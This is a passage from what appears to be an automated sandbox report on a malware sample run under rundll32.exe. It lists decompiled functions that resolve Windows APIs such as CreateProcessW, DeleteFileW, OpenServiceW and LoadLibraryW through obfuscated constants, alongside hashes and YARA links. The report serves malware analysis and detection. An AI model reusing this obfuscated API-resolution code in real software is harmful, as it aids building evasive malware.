				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001C602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E001D07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x001d9772
0x001d9773
0x001d9778
0x001d977a
0x001d977b
0x001d977e
0x001d977f
0x001d9782
0x001d9785
0x001d9788
0x001d9789
0x001d978c
0x001d978f
0x001d9790
0x001d9791
0x001d9794
0x001d9797
0x001d979a
0x001d979d
0x001d97a0
0x001d97a3
0x001d97a6
0x001d97a7
0x001d97a8
0x001d97ad
0x001d97b7
0x001d97c3
0x001d97ca
0x001d97d1
0x001d97d8
0x001d97df
0x001d97e3
0x001d97fc
0x001d9816
0x001d981d

APIs

CreateProcessW.KERNEL32(001C591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,001C591A), ref: 001D9816

Memory Dump Source

Source File: 00000009.00000002.2091148217.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000009.00000002.2091139794.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2091164348.00000000001DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 20f21d30f10ae6234dd47c65ab3716d7b13978f2ef040c719a6d235505af61fe
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: F611B372901149BBDF1A9FD6DC0ACDF7F7AEF99750F104148FA1556120D2728A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001CB566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E001CB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E001C602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E001D07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x001cb569
0x001cb56a
0x001cb56d
0x001cb572
0x001cb574
0x001cb577
0x001cb57a
0x001cb57d
0x001cb580
0x001cb583
0x001cb586
0x001cb587
0x001cb58a
0x001cb58d
0x001cb590
0x001cb593
0x001cb594
0x001cb595
0x001cb59a
0x001cb5a4
0x001cb5b8
0x001cb5c0
0x001cb5c4
0x001cb5cb
0x001cb5d2
0x001cb5d9
0x001cb5e6
0x001cb5fd
0x001cb604

APIs

CreateFileW.KERNELBASE(001D0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,001D0668,?,?,?,?), ref: 001CB5FD

Memory Dump Source

Source File: 00000009.00000002.2091148217.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000009.00000002.2091139794.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2091164348.00000000001DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 6474b0b056dd1446ba0cbdb78db585d44b3762dc5b9c736ac2795f5da4ed1508
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: 6911B272801248BBDF16DF95DD06CEE7F7AEF99314F148198FA1862120D3729A60EB50

Uniqueness

Uniqueness Score: -1.00%

Function 001D981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E001D981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001C602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E001D07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x001d9821
0x001d9822
0x001d9825
0x001d9828
0x001d982a
0x001d982c
0x001d982f
0x001d9832
0x001d9835
0x001d9836
0x001d9837
0x001d983c
0x001d9855
0x001d9858
0x001d985f
0x001d9866
0x001d986d
0x001d9874
0x001d987b
0x001d988e
0x001d989b
0x001d98a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,001C87F2,0000CAAE,0000510C,AD82F196), ref: 001D989B

Memory Dump Source

Source File: 00000009.00000002.2091148217.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000009.00000002.2091139794.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2091164348.00000000001DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: f305e31e9dddd463da641a55f8577ef9c24a19b2ea253f52b3322e46062ad1e3
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: A0019A72801208FBDB04EFD5D846CDFBF79EF95310F10818DF908A6220E6719B619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001D7BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E001D7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001C602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E001D07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x001d7bf7
0x001d7bf8
0x001d7bfa
0x001d7bfd
0x001d7bff
0x001d7c02
0x001d7c06
0x001d7c07
0x001d7c0f
0x001d7c1d
0x001d7c25
0x001d7c2d
0x001d7c31
0x001d7c38
0x001d7c3f
0x001d7c46
0x001d7c4a
0x001d7c5e
0x001d7c67
0x001d7c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 001D7C67

Memory Dump Source

Source File: 00000009.00000002.2091148217.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000009.00000002.2091139794.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2091164348.00000000001DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 2d453b1998db545c22669fdb2669d10e8b11c72ef14dc62f7d17afb6ab6d0142
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: A1014FB190120CFFEB09DF94C84A9DE7BB5EF54314F108199F40567240E7B15F509B91

Uniqueness

Uniqueness Score: -1.00%

Function 001CF65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E001CF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001C602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E001D07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x001cf662
0x001cf663
0x001cf665
0x001cf668
0x001cf66a
0x001cf66d
0x001cf670
0x001cf673
0x001cf677
0x001cf678
0x001cf67d
0x001cf687
0x001cf693
0x001cf69a
0x001cf6a1
0x001cf6a5
0x001cf6a9
0x001cf6b0
0x001cf6c9
0x001cf6d8
0x001cf6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 001CF6D8

Memory Dump Source

Source File: 00000009.00000002.2091148217.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000009.00000002.2091139794.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2091164348.00000000001DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 686296c243c948e16beda9c536ee708d4800bb1dd8449823ec2bc158ed88f8f1
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: 7F01E5B6901208BBEF059F94DC068DF7F75EB15324F148188F90466250D7B25E61DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001CB6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001CB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E001C602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E001D07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x001cb6f3
0x001cb6f8
0x001cb702
0x001cb70b
0x001cb712
0x001cb719
0x001cb720
0x001cb727
0x001cb72e
0x001cb747
0x001cb759
0x001cb75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 001CB759

Memory Dump Source

Source File: 00000009.00000002.2091148217.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000009.00000002.2091139794.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2091164348.00000000001DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: e280783abebfdd0d7976eaa09f3e3ca5bebcf510c298a9fb58a3a29206bd1b3c
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: AC012CB5941308FBEB45DF94DD06E9E7BB5EB18704F108188FA0966190D3B15A209B51

Uniqueness

Uniqueness Score: -1.00%

Function 001DAA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E001DAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001C602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E001D07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x001daa3f
0x001daa40
0x001daa41
0x001daa44
0x001daa47
0x001daa4b
0x001daa4c
0x001daa51
0x001daa5b
0x001daa64
0x001daa68
0x001daa6f
0x001daa76
0x001daa8d
0x001daa90
0x001daa9d
0x001daaa8
0x001daaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 001DAAA8

Memory Dump Source

Source File: 00000009.00000002.2091148217.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000009.00000002.2091139794.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2091164348.00000000001DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: d71e1bd8c9314d0d27f14770b55a8437bc9751afcd0c6fc663724ab07285f57b
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 89F069B190020CFFDF08DF94DD4A99EBFB4EB44304F108088F805A6250D3B29B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 001C5FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E001C5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001C602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E001D07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x001c5fb5
0x001c5fb6
0x001c5fb7
0x001c5fbb
0x001c5fbc
0x001c5fc1
0x001c5fcb
0x001c5fd7
0x001c5fde
0x001c5fe5
0x001c5ffc
0x001c5fff
0x001c6006
0x001c600d
0x001c601a
0x001c6025
0x001c602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 001C6025

Memory Dump Source

Source File: 00000009.00000002.2091148217.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000009.00000002.2091139794.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2091164348.00000000001DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: fcccdb7cf7845b0c87996f2184252aef1b0ae999b48dde9af7d4ec08dfa39e49
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: 28F04FB0C11208FFDB08DFA0E94689EBFB8EB50300F20819CE409A7260E7B19F559F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2880 Parent PID: 2684 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	16.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	993
Total number of Limit Nodes:	13

Executed Functions

Function 00252959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E00252959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0025602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002607A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x0025295f
0x00252964
0x00252967
0x0025296a
0x0025296d
0x0025296e
0x0025296f
0x00252977
0x00252985
0x0025298a
0x00252992
0x0025299a
0x002529a2
0x002529a9
0x002529b0
0x002529b7
0x002529bb
0x002529cf
0x002529dc
0x002529e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002529DC

Strings

<^, xrefs: 00252977

Memory Dump Source

Source File: 0000000A.00000002.2092986854.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true

Associated: 0000000A.00000002.2092976084.0000000000250000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2093011511.000000000026C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_250000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 33dfa3c1d35cc9879a733454cfbeac04152e2f4093096828af0e7f85c150b977
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: FC016D72A00108BFEB14DF95DC4A8DFBFB6EF44310F108088F508A6250D7B69F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0025C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0025C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0025602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002607A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x0025c6e1
0x0025c6e6
0x0025c6f0
0x0025c6fc
0x0025c703
0x0025c706
0x0025c70d
0x0025c711
0x0025c715
0x0025c71c
0x0025c723
0x0025c72a
0x0025c731
0x0025c738
0x0025c751
0x0025c762
0x0025c768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0025C762

Strings

/O, xrefs: 0025C6E6

Memory Dump Source

Source File: 0000000A.00000002.2092986854.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true

Associated: 0000000A.00000002.2092976084.0000000000250000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2093011511.000000000026C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_250000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: baafa9778dc446369fdbbf24d4533c3815a7610ac10221fdb0ab2357abce437a
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: 611133B290122DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00251000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00251000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0025602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002607A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x00251006
0x00251009
0x0025100c
0x00251011
0x00251016
0x0025101d
0x00251026
0x0025102d
0x00251034
0x0025103b
0x00251047
0x0025104f
0x00251057
0x0025105e
0x00251065
0x0025106c
0x00251073
0x00251077
0x0025108b
0x00251096
0x0025109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00251096

Strings

[, xrefs: 0025103B

Memory Dump Source

Source File: 0000000A.00000002.2092986854.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true

Associated: 0000000A.00000002.2092976084.0000000000250000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2093011511.000000000026C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_250000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: fdf4071e261dd71de8bb037cab8b5bf1dfdc30cb7bde443b759affbe5f02278a
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: 2C015BB6D01308BBDF04DF94C94A5DEBBB1EB54318F108188E41466291D3B19B689B91

Uniqueness

Uniqueness Score: -1.00%

Function 00254859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00254859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002607A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x0025485e
0x0025487a
0x0025487d
0x00254884
0x0025488b
0x00254892
0x0025489d
0x002548a0
0x002548ad
0x002548b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 002548B7

Strings

[, xrefs: 0025488B

Memory Dump Source

Source File: 0000000A.00000002.2092986854.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true

Associated: 0000000A.00000002.2092976084.0000000000250000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2093011511.000000000026C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_250000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: cd5c2410cb2683136d7d70b5a3a887321da5486bcd2c2a1e36389db571b024c3
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 26F017B0A15209FBDB04CFE8CA9699EBFB9EB40301F20818CE444B7290E3B15F509B50

Uniqueness

Uniqueness Score: -1.00%

Function 00264F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00264F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0025602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002607A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00264f80
0x00264f81
0x00264f82
0x00264f86
0x00264f87
0x00264f8c
0x00264fa5
0x00264fa8
0x00264faf
0x00264fb6
0x00264fc7
0x00264fca
0x00264fd7
0x00264fe2
0x00264fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00264FE2

Strings

{#lm, xrefs: 00264FC2

Memory Dump Source

Source File: 0000000A.00000002.2092986854.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true

